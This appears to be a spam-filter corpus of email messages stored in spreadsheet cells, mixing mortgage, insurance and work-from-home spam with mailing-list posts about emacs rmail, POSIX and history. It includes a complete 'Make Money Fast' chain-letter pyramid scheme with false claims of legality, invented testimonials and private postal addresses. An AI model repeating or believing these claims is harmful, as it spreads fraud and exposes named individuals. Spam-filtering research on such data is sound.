 cmlhbCIgY29sb3I9IiMwMDAwRkYiPjxiPjxpPkRpZCB5b3UgY29tcGxldGUgdGhlIG9yZGVyDQog
 ICAgICAgICAgZm9ybSA/PC9pPjwvYj48L2ZvbnQ+DQogICAgICAgIDxsaT48Zm9udCBmYWNlPSJB
 cmlhbCIgY29sb3I9IiMwMDAwRkYiPjxiPjxpPkRpZCB5b3Ugc2lnbiBhbmQgaW5pdGlhbA0KICAg
 ICAgICAgIHRoZSBmb3JtID88L2k+PC9iPjwvZm9udD4NCiAgICAgICAgPGxpPjxmb250IGZhY2U9
 IkFyaWFsIiBjb2xvcj0iIzAwMDBGRiI+PGI+PGk+RGlkIHlvdSBlbmNsb3NlIHBheW1lbnQgZm9y
 DQogICAgICAgICAgJDUwID88L2k+PC9iPjwvZm9udD4NCiAgICAgICAgPGxpPjxmb250IGZhY2U9
 IkFyaWFsIj48Yj48aT48Zm9udCBjb2xvcj0iIzAwMDBGRiI+RGlkIHlvdSBGQVggeW91cg0KICAg
 ICAgICAgIG9yZGVyIHdpdGggY2hlY2s8YnI+DQogICAgICAgICAgLWJ5LWZheCBmb3IgcXVpY2tl
 c3QgcHJvY2Vzc2luZyA/PC9mb250Pjxicj4NCiAgICAgICAgICA8L2k+PC9iPjwvZm9udD48L2xp
 Pg0KICAgICAgPC9vbD4NCiAgICAgIDwvZm9udD48Zm9udCBzaXplPSIyIj4NCiAgICAgIDxwPjxm
 b250IGZhY2U9IkFyaWFsIj5ESUQgWU9VLi4uLldBS0UgVVAgVEhJUyBNT1JOSU5HLi4uLjxicj4N
 CiAgICAgIEFORCBSRUFMSVpFLCBZT1VSIEZVVFVSRSBXT1VMRC4uLi48YnI+DQogICAgICBDSEFO
 R0UgV0lUSCBGSVZFIE1JTlVURVMgJmFtcDsgT05FIEUtTUFJTD88YnI+DQogICAgICA8YnI+DQog
 ICAgICA8L2ZvbnQ+PGZvbnQgZmFjZT0iQXJpYWwiPlRoYW5rIFlvdSwgTXkgbmFtZSBpcyBEYWxs
 aW4NCiANCiAgICAgIDwvZm9udD48L3A+DQogICAgICA8cD4mbmJzcDs8L3A+DQogICAgICA8L2Zv
 bnQ+PC9mb250PjwvdGQ+DQogICAgPC90cj4NCiAgPC90Ym9keT4NCjwvdGFibGU+DQo8cD48Zm9u
 dCBzaXplPSIyIj48Yj48aT48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iQXJpYWwiPkZvciBt
 b3JlIGluZm9ybWF0aW9uLA0KY2FsbCB0b2xsIGZyZWUgODc3LTg5Mi03NTcwPGJyPg0KPGJyPg0K
 PC9mb250PjwvaT48L2I+PC9mb250Pjxmb250IHNpemU9IjIiIGZhY2U9IkFyaWFsIj5IYXZlIFlv
 dSBEcmVhbWVkIE9mIFlvdXIgT3duIEhvbWUgQmFzZWQgQnVzaW5lc3M/ICAgIA0KPC9mb250Pjxm
 b250IHNpemU9IjIiPjxiPjxpPjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJBcmlhbCI+PGJy
 Pg0KPGJyPg0KPC9mb250PjwvaT48L2I+PC9mb250Pjxmb250IGZhY2U9IkFyaWFsIj4NCllvdXIg
 RS1NYWlsIFRyYWNraW5nIE51bWJlcjo8L2ZvbnQ+PC9wPg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4N
 Cg0KW1o1Vllqa3lENWRjeVEtNEpCODhDZjVieFotOG9pZ1VVVnVoUUxXVjViZFZ0aDJ5N1ZuYWpd
 DQoNCiANCg==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] emacs rmail  How to sort subject lines and headers.
</t>
  </si>
  <si>
    <t xml:space="preserve">In emacs rmail what varieties of different techniques are there for
 sorting your favorite correspondents from the mix?... leaving the hundreds
 of spam commercials. A filter for the campus computer system puts subject
 lines and headers on many of the hundreds of spam commercials
 with http://spamassassin.org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</si>
  <si>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You're Paying Too Much
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_706_245554380
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: Quoted-Printable
 We will help you get the mortgage loan you want! 
 Only takes 2 minutes to fill out our form. 
 http://xnet.123alias.com/index.php
 Whether a new home loan is what you seek or to refinance your current home =
 loan
 at a lower interest rate and payment, we can help!
 Mortgage rates haven't been this low in the last 12 months, take action now!
 Refinance your home with us and include all of those pesky credit card bills =
 or
 use the extra cash for that pool you've always wanted... 
 Where others says NO, we say YES!!!
 Even if you have been turned down elsewhere, we can help! 
 Easy terms! Our mortgage referral service combines the
 highest quality loans with most economical rates and the easiest =
 qualification!
 Click Here to fill out our form. 
 http://xnet.123alias.com/index.php
 ------=_NextPart_706_245554380
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: Quoted-Printable
 &lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;
 &lt;html&gt;
 &lt;head&gt;
    &lt;meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; U) =
 [Netscape]"&gt;
    &lt;title&gt;Get the perfect mortgage fast. It's simple.&lt;/title&gt;
 &lt;/head&gt;
 &lt;body text=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"535"&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;img SRC=3D"http://xnet.123alias.com/images/headline.gif" NOSAVE height=3D24 =
 width=3D384&gt;
 &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font size=3D-1&gt;We can help
 find the perfect mortgage for you. Just click on the option below that
 best meets your needs:&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"535" &gt;
 &lt;caption&gt;&amp;nbsp;&lt;/caption&gt;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
 php"&gt;Refinance
 your existing mortgage&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;lower
 your payments&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DCENTER ROWSPAN=3D"4" WIDTH=3D"225"&gt;&lt;img SRC=3D"http://xnet.=
 123alias.com/images/mort_house_image2.jpg" NOSAVE height=3D122 width=3D196&gt;&lt;/td&gt;
 &lt;/tr&gt;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
 php"&gt;Consolidate
 your debt&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;simplify
 your life&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;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href=3D"http://xnet.123alias.com/index.php"&gt;Home
 Equity financing&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;get
 extra cash&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;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
 php"&gt;Purchase
 a home&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;i&gt;&lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font color=3D"#666666"&gt;&lt;font =
 size=3D+0&gt;there's
 never been a better time&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/i&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td ALIGN=3DCENTER VALIGN=3DTOP WIDTH=3D"60"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D60&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"250"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D250&gt;&lt;/td&gt;
 &lt;td ALIGN=3DLEFT VALIGN=3DCENTER WIDTH=3D"225"&gt;&lt;img SRC=3D"http://xnet.123alias.=
 com/images/spacer.gif" height=3D10 width=3D225&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font size=3D-1&gt;&lt;b&gt;Here's how it
 works... &lt;/b&gt;After completing a short form, we will automatically sort
 through our database of over 2700 lenders to find the ones most qualified
 to meet your needs. Up to three lenders will then contact you and compete
 for your business. The search is &lt;b&gt;free&lt;/b&gt; and &lt;b&gt;there's no obligation
 to continue.&lt;/b&gt; It's that easy, so &lt;b&gt;&lt;a href=3D"http://xnet.123alias.=
 com/index.php"&gt;click
 here&lt;/a&gt;&lt;/b&gt; to get started now!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;center&gt;
 &lt;hr WIDTH=3D"540"&gt;&lt;/center&gt;
 &lt;center&gt;&lt;table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D"540" &gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;center&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&lt;font =
 color=3D"#000000"&gt;This
 email was sent to you via Saf-E Mail Systems.&amp;nbsp; Your email address
 was automatically inserted into the To and From addresses to eliminate
 undeliverables which waste bandwidth and cause internet congestion. Your
 email or webserver &lt;b&gt;IS NOT &lt;/b&gt;being used for the sending of this mail.
 No-one else is receiving emails from your address. You may utilize the
 removal link below if you do not wish to receive this mailing. &lt;/font&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;b&gt;Please &lt;a href=3D"http://xnet.123alias.com/remove.html"&gt;Remove =
 Me&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font size=3D-2&gt;&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;font face=3D"Arial,Helvetica"&gt;&lt;font color=3D"#000000"&gt;&lt;font size=3D-2&gt;Saf-E =
 Mail Systems, PO Box 116-3015 San Rafael de Heredia, =
 CR&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_706_245554380--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Mortgage Rates Are Down.  isoxtjcn
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.
 http://getit.routeit21.com/sure_quote/
 Take a moment to let us show you that we are here to save you money and address your concerns with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's top companies.
 -Mortgage rates that save you thousands.
 -New home loans.
 -Refinance or consolidate high interest credit card debt into a low interest mortgage.
 http://getit.routeit21.com/sure_quote/
 "...was able to get 3 great offers in
 less than 24 hours." -Jennifer C
 "Met all my needs... being able to search
 for loans in a way that puts me in control." -Robert T.
 "..it was easy, effortless...!"-Susan A.
 Click here to delete your address from future updates.
 http://getit.routeit21.com/sure_quote/rm/
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Major's shame over affair leaves Currie indignant
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381144,215/
 Date: 2002-09-30T03:04:59+01:00
 *Politics:* Edwina Currie 'sad and indignant' at hearing John Major's admission 
 of shame at their four-year affair.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 100% Risk-FREE Way To Explosive Profits !
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi jm@netnoteinc.com,
 Are you ready to hear the cold hard facts about
 internet marketing?
 http://BulletProofMarketing.Does.It
 The TRUTH is sometimes hard to swallow
 and is in VERY short supply on the internet!
 Now you can put this to an end and RETIRE in 6 months!
 * Want to make $5,000/mo. within 60 days using proven 
    methods that work? NO BULL!
 * Tired of KILLING yourself promoting programs that pay 
    just once?
 * Want to make MORE and MORE while you do LESS and LESS?
 * Want to live worry free while THOUSANDS of other people 
    build YOUR business?
 * Want to send out 20,000 TARGETED up-to-date emails DAILY?
 Click here when you're ready for some real money! 
 http://BulletProofMarketing.Does.It
 Don't be left behind... ACT NOW!
 Sincerely, 
 NetProMarketing
 Direct Consulting for the home-biz entrepreneurial type.
 &lt;a href="http://BulletProofMarketing.Does.It"&gt;AOL Members Click 
 Here&lt;/a&gt;
 _________________________________________________
 Disclaimer
 =======
 Thanks for reading this review - it'll be beneficial to your 
 online marketing efforts! 
 Anyways, should you, jm@netnoteinc.com, 
 have received this message by mistake, just hit 'Reply' 
 and put 'REMOVE' in the subject line.
 Enjoy your prosperity !
 _________________________________________________
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] How to copy some files
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Mon, 22 Jul 2002 09:09:41 +0100
   | From: "John P. Looney" &lt;valen@tuatha.org&gt;
   |[ ... ]
   | That's something that POSIX would do - make every platform as
   | equally broken, rather than standing up and saying "how about
   | we try &amp; make everyone better".
  eh?  POSIX doesn't "do" anything.  POSIX is a de jour
  specification for a voluntary minimal implementation to
  encourage software transportability.  no-one, absolutely
  no-one, has or ever had to implement POSIX or be restricted
  to POSIX.  commercial considerations et.al. may encourage
  some "POSIX-compatibility", but that's a freely-made choice.
  IMHO, the process's weakness is a general rule --- which
  has been ignored on occasion --- to only consider "formal"
  submissions of "proven" technologies.  that translates into
  specifying more-or-less common parts of the existing *ix
  implementations which actively contribute to the process.
  most of the committees are loath to blue-sky, solicit
  proposals/research, or pick an uncommon or unsponsored
  implementation, even when manifestly superior.  (IMHO,
  this is why POSIX is *ix and not, e.g., Plan9 or Inferno.)
  OTOH, considering the motivating force behind the process,
  it can be argued the above "weakness" is a strength ....
   | (why? Because in the real world, you can't. Somethings just suck)
  yep.  which is not to say POSIX "sucks" per se.  but the old
  pre-POSIX *ix world arguably did, at least in terms of ease
  of software porting.  one of *ix's claims to fame is it is
  perhaps the first system where one could seriously consider
  porting, more or less intact and with relative ease, software
  from one architecture+platform+vendor to a radically utterly
  different triple.
  however, as people discovered, there's a lot of difference
  between "consider porting" and "actually porting" --- and
  some problems were silly.  some were self-inflicted (e.g.,
  assuming byte-orientation or a particular endianness); but
  others were Frustrating "system" incompatibilities --- the
  motivating force that lead to /usr/group, XPG (X/Open), POSIX,
  Spec1170, Unix98, Common Unix, &amp;tc.
      «The nice thing about standards is there's so many to
       choose from.»   -- commonly attributed to bwk.
 cheers!
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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Subject: Re: Al'Qaeda's fantasy ideology:  Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:35 AM -0400 on 8/17/02, Gary Lawrence Murphy wrote:
 &gt; Wasn't the Aztec population that greeted Cortez already largely
 &gt; decimated by the microbiology brought over by DeSoto nearly a hundred
 &gt; years before?
 &gt;&gt;From my PBS education (Michael whatsisname, the "Alexander" guy, among
 other things) on the subject, I believe the smallpox stuff happened
 *during* the invasion. The conquistadores themselves were, in fact, disease
 vectors.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</si>
  <si>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Subject: ADV: Low Cost Life Insurance -- FREE Quote aaqnf
</t>
  </si>
  <si>
    <t xml:space="preserve">Low-Cost Term-Life Insurance!
 SAVE up to 70% or more on your term life insurance policy now.
 Male age 40 - $250,000 - 10 year level term - as low as $11 per month.
 CLICK HERE NOW For your FREE Quote!
 http://hey11.heyyy.com/insurance/
 If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
 We offer the lowest rates available from nationally recognized carriers.
 Act now and pay less!
 CLICK HERE 
 http://hey11.heyyy.com/insurance/
 ++++++++++++++++++++++++++++
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://hey11.heyyy.com/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: Make Money Fast And Legal! As Seen on TV! 65000$+
</t>
  </si>
  <si>
    <t xml:space="preserve">THE ULTIMATE WAY TO WORK FROM HOME 
 THE BEST MONEY MAKING SYSTEM OF ALL!! 
 AS SEEN ON NATIONAL TV 
 As seen on 20/20 and many other credible references. This is NOT a scam. 
 I hope this is ok that I send you this. If you aren't interested, just 
 simply delete it. 
 READ THIS MESSAGE if you are like me and want more than your lousy 
 weekly paycheck. Make more in a few months than last year at work. 
 Believe it, work it. 
 This really works, don't make the same mistake I made. I deleted this 
 4-5 times before finally giving it a try. Within 2 weeks the orders 
 (money) 
 started coming in just like the plan below said it would. Give it a 
 try!! 
 You will be glad you did. 
 Thanks and Good Luck! You won't need luck, just keep reading. Don't 
 delete this!!! 
 ------------------------------------------------------ 
 First read about how a 15 year old made $71,000. See below.... 
 AS SEEN ON NATIONAL TV: This is the media report. 
 PARENTS OF 15 - YEAR OLD - FIND $71,000 CASH HIDDEN 
 IN HIS CLOSET! 
 Does this headline look familiar? Of course it does. 
 You most likely have just seen this story recently 
 featured on a major nightly news program (USA). 
 And reported elsewhere in the world (including my neck 
 of the woods - New Zealand). His mother was cleaning 
 and putting laundry away when she came across a large 
 brown paper bag that was suspiciously buried beneath 
 some clothes and a skateboard in the back of her 
 15-year-old sons closet. 
 Nothing could have prepared her for the shock she got 
 when she opened the bag and found it was full of cash. 
 Five-dollar bills, twenties, fifties and hundreds - 
 all neatly rubber-banded in labeled piles. 
 "My first thought was that he had robbed a bank", 
 says the 41-year-old woman, "There was over $71,000 
 dollars in that bag -- that's more than my husband 
 earns in a year". 
 The woman immediately called her husband at the 
 car-dealership where he worked to tell him what she 
 had discovered. He came home right away and they 
 drove together to the boys school and picked him up. 
 Little did they suspect that where the money came from 
 was more shocking than actually finding it in 
 the closet. 
 As it turns out, the boy had been sending out, via 
 E-mail, a type of "Report" to E-mail addresses that he 
 obtained off the Internet. Everyday after school for 
 the past 2 months, he had been doing this right on his 
 computer in his bedroom. 
 "I just got the E-mail one day and I figured what the 
 heck, I put my name on it like the instructions said 
 and I started sending it out", says the clever 
 15-year-old. 
 The E-mail letter listed 5 addresses and contained 
 instructions to send one $5 dollar bill to each person 
 on the list, then delete the address at the top and 
 move the others addresses down, and finally to add 
 your name to the top of the list. 
 The letter goes on to state that you would receive 
 several thousand dollars in five-dollar bills within 2 
 weeks if you sent out the letter with your 
 name at the top of the 5-address list. "I get junk 
 E-mail all the time, and really did not think it was 
 going to work", the boy continues. 
 Within the first few days of sending out the E-mail, 
 the Post Office Box that his parents had gotten him 
 for his video-game magazine subscriptions began to 
 fill up with not magazines, but envelopes containing 
 $5 bills. 
 "About a week later I rode [my bike] down to the post 
 office and my box had 1 magazine and about 300 
 envelops stuffed in it. There was also a yellow slip 
 that said I had to go up to the [post office] counter. 
 I thought I was in trouble or something (laughs)". He 
 goes on, "I went up to the counter and they had a 
 whole box of more mail for me. I had to ride back 
 home and empty out my backpack because I could not 
 carry it all". 
 Over the next few weeks, the boy continued sending 
 out the E-mail. "The money just kept coming in and I 
 just kept sorting it and stashing it in the closet, 
 barely had time for my homework". He had also 
 been riding his bike to several of the banks in his 
 area and exchanging the $5 bills for twenties, fifties 
 and hundreds. 
 "I didn't want the banks to get suspicious so I kept 
 riding to different banks with like five thousand at a 
 time in my backpack. I would usually tell the lady at 
 the bank counter that my dad had sent me in to 
 exchange the money and he was outside waiting for me. 
 One time the lady gave me a really strange look and 
 told me that she would not be able to do it for me and 
 my dad would have to come in and do it, but I just 
 rode to the next bank down the street (laughs)." 
 Surprisingly, the boy did not have any reason to be 
 afraid. The reporting news team examined and 
 investigated the so-called "chain-letter" the boy was 
 sending out and found that it was not a chain-letter 
 at all. In fact, it was completely legal according to 
 US Postal and Lottery Laws, Title 18, Section 1302 and 
 1341, or Title 18, Section 3005 in the US code, also 
 in the code of federal regulations, Volume 16, 
 Sections 255 and 436, which state a product or service 
 must be exchanged for money received. 
 Every five-dollar bill that he received contained a 
 little note that read, "Please send me report number 
 XYX".This simple note made the letter legal because he 
 was exchanging a service (A Report on how-to) for a 
 five-dollar fee. 
 [This is the end of the media release. If you would 
 like to understand how the system works and get your 
 $71,000 - please continue reading. What appears below 
 is what the 15 year old was sending out on the net - 
 YOU CAN USE IT TOO - just follow the simple 
 instructions]. 
 THANKS TO THE COMPUTER AGE AND THE INTERNET ! 
 ================================================== 
 You will Make over half million dollars every 4 to 5 months from your 
 home!! 
 Before you say ''Bull'', please read the following. This is the 
 letter you have been hearing about on the news lately. Due to the 
 popularity of this letter on the Internet, a national weekly news 
 program 
 recently devoted an entire show to the investigation of this program 
 described below, to see if it really can make people money. The show 
 also 
 investigated whether or not the program was legal. 
 Their findings proved once and for all that there are ''absolutely NO 
 Laws prohibiting the participation in the program and if people can -follow 
 the simple instructions, they are bound to make some mega bucks with only 
 $25 out of pocket cost''. 
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS 
 PROGRAM HAS 
 ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER. 
 This is what one had to say: '' Thanks to this profitable opportunity. 
 I was approached many times before but each time I passed on it. I am so 
 glad I finally joined just to see what one could expect in return for 
 the minimal effort and money required. To my astonishment, I received 
 total 
 $610,470.00 in 21 weeks, with money still coming in''. 
 Pam Hedland, Fort Lee, New Jersey. 
 =========================================================
 =======Here is 
 another testimonial: ''' this program has been around for a 
 long time but I never believed in it. But one day when I received this 
 again in the mail I decided to gamble my $25 on it. I followed the 
 simple instructions and wallaa ..... 3 weeks later the money started to 
 come 
 in. First month I only made $240.00 but the next 2 months after that 
 made a total of $290,000.00. So far, in the past 8 months by re-entering 
 the 
 program, I have made over $710,000.00 and I am playing it again. The 
 key to success in this program is to follow the simple steps and NOT change 
 anything.'' More testimonials later but first: 
 ===== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ======== 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$$$$$$$ 
 If you would like to make at least $500,000 every 4 to 5 months easily 
 and comfortably, please read the following...THEN READ IT AGAIN and 
 AGAIN!!! 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$$$$$$$ 
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL 
 DREAMS WILL COME 
 TRUE, GUARANTEED! 
 INSTRUCTIONS: 
 ================Order all 5 reports shown on the list below 
 ================= 
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT 
 YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the person whose 
 name appears ON THAT LIST next to the report. MAKE SURE YOUR RETURN 
 ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of any mail 
 problems. 
 === When you place your order, make sure you order each of the 5 
 reports. 
 You will need all 5 reports so that you can save them on your computer 
 and resell them. YOUR TOTAL COST $5 X 5=$25.00. 
 Within a few days you will receive, via e-mail, each of the 5 reports 
 from these 5 different individuals. Save them on your computer so they will 
 be accessible for you to send to the 1,000's of people who will order them 
 from you. Also make a floppy of these reports and keep it on your desk 
 in case something happens to your computer. 
 IMPORTANT - DO NOT alter the names of the people who are listed 
 next to each report, or their sequence on the list, in any way other 
 than what is instructed below in step '' 1 through 6 '' or you will 
 loose out on majority of your profits. Once you understand the way this 
 works, you will also see how it does not work if you change it. Remember, 
 this 
 method has been tested, and if you alter, it will NOT work !!! People 
 have tried to put their friends/relatives names on all five thinking they 
 could get all the money. But it does not work this way. Believe us, we all 
 have tried to be greedy and then nothing happened. So Do Not try to change 
 anything other than what is instructed. Because if you do, it will not 
 work for you. 
 Remember, honesty reaps the reward!!! 
 1.... After you have ordered all 5 reports, take this advertisement 
 and REMOVE the name &amp; address of the person in REPORT #5. 
 This person has made it through the cycle and is no doubt counting 
 their fortune. 
 2.... Move the name &amp; address in REPORT # 4 down TO REPORT # 5. 
 3.... Move the name &amp; address in REPORT # 3 down TO REPORT # 4. 
 4.... Move the name &amp; address in REPORT # 2 down TO REPORT # 3. 
 5.... Move the name &amp; address in REPORT # 1 down TO REPORT # 2 
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position. 
 PLEASE MAKE SURE you copy every name &amp; address ACCURATELY! 
 =========================================================
 ======= 
 **** Take this entire letter, with the modified list of names, and save it 
 on your computer. DO NOT MAKE ANY OTHER CHANGES. 
 Save this on a disk as well just in case you loose any data. To assist 
 you with marketing your business on the internet, the 5 reports you 
 purchase will provide you with invaluable marketing information which 
 includes how to send bulk e-mails legally, where to find thousands of 
 free 
 classified ads and much more. There are 2 Primary methods to get this 
 venture going: 
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY 
 =========================================================
 ======= 
 Let's say that you decide to start small, just to see how it goes, and 
 we will assume You and those involved send out only 5,000 e-mails each. 
 Let's also assume that the mailing receive only a 0.2% response (the 
 response 
 could be much better but lets just say it is only 0.2%. Also many 
 people will send out hundreds of thousands e-mails instead of only 5,000 
 each).Continuing with this example, you send out only 5,000 e-mails. 
 With a 0.2% response, that is only 10 orders for report # 1 
 Those 10 people responded by sending out 5,000 e-mail each for a total 
 of 50,000. 
 Out of those 50,000 e-mails only 0.2% responded with orders. That's=100 
 people responded and ordered Report # 2. 
 Those 100 people mail out 5,000 e-mails each for a total of 500,000 
 e-mails. The 0.2% response to that is 1000 orders for Report # 3. 
 Those 1000 people send out 5,000 e-mails each for a total of 5 
 million e-mails sent out. The 0.2% response to that is 10,000 orders 
 for Report! # 4. Whose 10,000 people send out 5,000 e-mails each for a 
 total of 
 50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000 
 orders for 
 Report # 5 THAT'S 100,000 ORDERS TIMES $5 EACH=$500,000.00 (half 
 million). 
 Your total income in this example is: 1..... $50 + 2..... $500 
 + 3.....$5,000 + 4..... $50,000 + 5..... $500,000 ........ Grand 
 Total=$555,550.00 
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND FIGURE OUT THE 
 WORST POSSIBLERESPONSES AND NO MATTER HOW YOU 
 CALCULATE IT, YOU WILL STILL 
 MAKE A LOT OF MONEY ! 
 =========================================================
 ======= 
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING 
 OUT 
 OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen if 
 everyone or half or even one 4th of those people mailed 100,000e-mails 
 each or more? There are over 150 million people on the Internet worldwide 
 and counting. Believe me, many people will do just that, and more! 
 METHOD # 2 : BY PLACING FREE ADS ON THE INTERNET 
 =========================================================
 ======= 
 Advertising on the net is very very inexpensive and there are 
 hundreds of FREE places to advertise. Placing a lot of free ads on the 
 Internet will easily get a larger response. We strongly suggest you 
 start with Method # 1and add METHOD # 2 as you go along. For every $5 you 
 receive, all you must do is e-mail them the Report they ordered. That's 
 it. Always provide 
 same day service on all orders. 
 This will guarantee that the e-mail they send out, with your 
 name and address on it, will be prompt because they can not advertise 
 until they receive the report. 
 ===================AVAILABLE REPORTS 
 ========================== 
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always 
 send 
 $5 cash (U.S. CURRENCY) for each Report. Checks NOT accepted. Make sure 
 the cash is concealed by wrapping it in at least 2 sheets of paper. On 
 one of those sheets of paper, Write the NUMBER &amp; the NAME of the Report you 
 are ordering, 
 YOUR E-MAIL ADDRESS and your name and postal address. 
 PLACE YOUR ORDER FOR THESE REPORTS NOW : 
 =========================================================
 ======= 
 REPORT #1 "The Insider's Guide to Advertising for Free on the Net" 
 Order Report #1 from: 
 K.Palludan 
 9550 Summersweet Ct. 
 Las Vegas, Nevada 89123 
 USA 
 ________________________________________________________________
 ______ 
 REPORT #2 "'The insider's Guide to Sending Bulk e-mail on the Net' 
 Order Report #2 from: 
 Kris Estes 
 3055 Casey Drive #203 
 Las Vegas, Nevada 89120 
 ________________________________________________________________
 ______ 
 REPORT #3 "'Secret to Multilevel Marketing on the Net" 
 Order Report #3 from : 
 P. Clement 
 601 St-Malo Est 
 Ile Bizard, Quebec H9C2P2 
 CANADA 
 ________________________________________________________________
 ______ 
 REPORT #4 "'How to become a Millionaire Utilizing MLM and the Net" 
 Order Report #4 from: 
 David Carpenter 
 13 Dutch lane 
 Hazlet, New Jersey 07732 
 USA 
 ________________________________________________________________
 _____ 
 REPORT #5 "'How to send out one Million e-mails for FREE" 
 Order Report #5 from: 
 S. Lasley 
 4230 Edgewood Circle 
 Idaho Falls, Idaho 83406 
 USA 
 ________________________________________________________________
 _____ 
